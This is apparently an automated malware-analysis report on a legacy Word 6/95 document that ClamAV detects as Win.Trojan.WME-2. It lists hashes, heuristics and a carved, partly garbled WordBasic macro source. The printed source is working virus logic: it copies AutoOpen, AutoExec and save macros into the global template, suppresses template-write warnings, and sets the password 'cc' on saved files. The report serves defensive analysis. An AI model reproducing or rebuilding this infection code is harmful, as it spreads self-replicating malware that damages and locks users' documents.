Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e51732e81c5a3b71…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 8.0 KB
First seen: 2012-06-14
MD5: bc46a41ece664cc506fe52c8e382a93c
SHA-1: 364f7ffe576364578af09cfbba42dc5e33425cba
SHA-256: e51732e81c5a3b7157706b7a05a83b712eb42fdcbb45e0ec81aae501bf4ddeea
Risk Score: 102

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits legacy WordBasic macro virus markers, specifically identifying it as a "RSN MACRO VIRUS Goat file". The presence of these markers and the ClamAV detection strongly suggest it is a historical malware sample intended to spread via document infection. The document body contains numerous references to macro names and functions typical of older macro viruses.

Heuristics (3)

  • ClamAV: Win.Trojan.WME-2 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.WME-2
  • Legacy WordBasic macro-virus markers (severity: high, rule: OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    The OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen together with ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Recovered legacy WordBasic macro source (severity: info, rule: OLE_LEGACY_WORDBASIC_MACRO_SOURCE)
    The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so that its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: wordbasic_macros.txt
Kind: wordbasic-macro
Source: analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source)
Size: 1840 bytes
SHA-256: b873e7f1727e7344ca886d1f07f794f52f6b6d0569855dbdbbff0c09d4da0231

Preview of the extracted script (first 1,000 lines):
= =  
  25964    
  26465      
REM  MACRO: wss
REM  PURPOSE: Main macro.
REM  This macro was generated by WME
MAIN
Makkop Name$
GlPres
AcPres
Makkop = 0
GlPres = 0
AcPres = 0
REM  Disable NORMAL.DOT write access warnings
@cmd00d1 = 0
REM  Check If we in Global template
I = 1 @cmd80b7 0
@cmd80b8 I , 0 = "wss"
GlPres = 1 REM   Schon erledigt
I
REM  Check if document allready infected
X = @cmd80b7 1
X = 0 * SkAcCheck
I = 1 @cmd80b7 1
@cmd80b8 I , 1 = "wss"
AcPres = 1 REM  Schon erledigt
I
GlPres = 0
@cmd80c2 Name$ = ":DateiSpeichern" , "DateiSpeichern" , 0
@cmd80c2 Name$ = ":DateiSpeichernUnter" , "DateiSpeichernUnter" , 0
@cmd80c2 Name$ = ":AutoOpen" , "AutoOpen" , 0
@cmd80c2 Name$ = ":AutoExec" , "AutoExec" , 0
@cmd80c2 Name$ = ":wss" , "wss" , 0
AcPres = 0
CopyMakros = 1
@cmd80c2 "DateiSpeichern" , Name$ = ":DateiSpeichern" , 0
@cmd80c2 "DateiSpeichernUnter" , Name$ = ":DateiSpeichernUnter" , 0
@cmd80c2 "AutoOpen" , Name$ = ":AutoOpen" , 0
@cmd80c2 "AutoExec" , Name$ = ":AutoExec" , 0
@cmd80c2 "wss" , Name$ = ":wss" , 0
REM  MACRO: AutoExec
REM  PURPOSE: Remove some AV shit (something like as DisableAutoMacros)
REM  This macro was generated by WME
MAIN
REM  MACRO: AutoOpen
REM  PURPOSE: Infect Document or Global template.
REM  This macro was generated by WME
MAIN
, - * NoAuto
REM  Infect document
X = wss @cmd8025
REM  MACRO: DateiSpeichern
REM  PURPOSE: Infect document when it saved
REM  This macro was generated by WME
MAIN
, - * NoSave
@cmd80d6 0 REM  Reenable auto macros processing
REM  Infect document
X = wss @cmd8025
REM  Convert document into template
@cmd0054 = 1
REM  MACRO: DateiSpeichernUnter
REM  PURPOSE: Set password to document when file is saved
REM  This macro was generated by WME
MAIN
dlg @cmd0054
dlg
dlg
REM  Check conditions
@cmd80f2 @cmd80f7 3
REM  Set password "cc"
dlg = "cc"
@cmd0054 dlg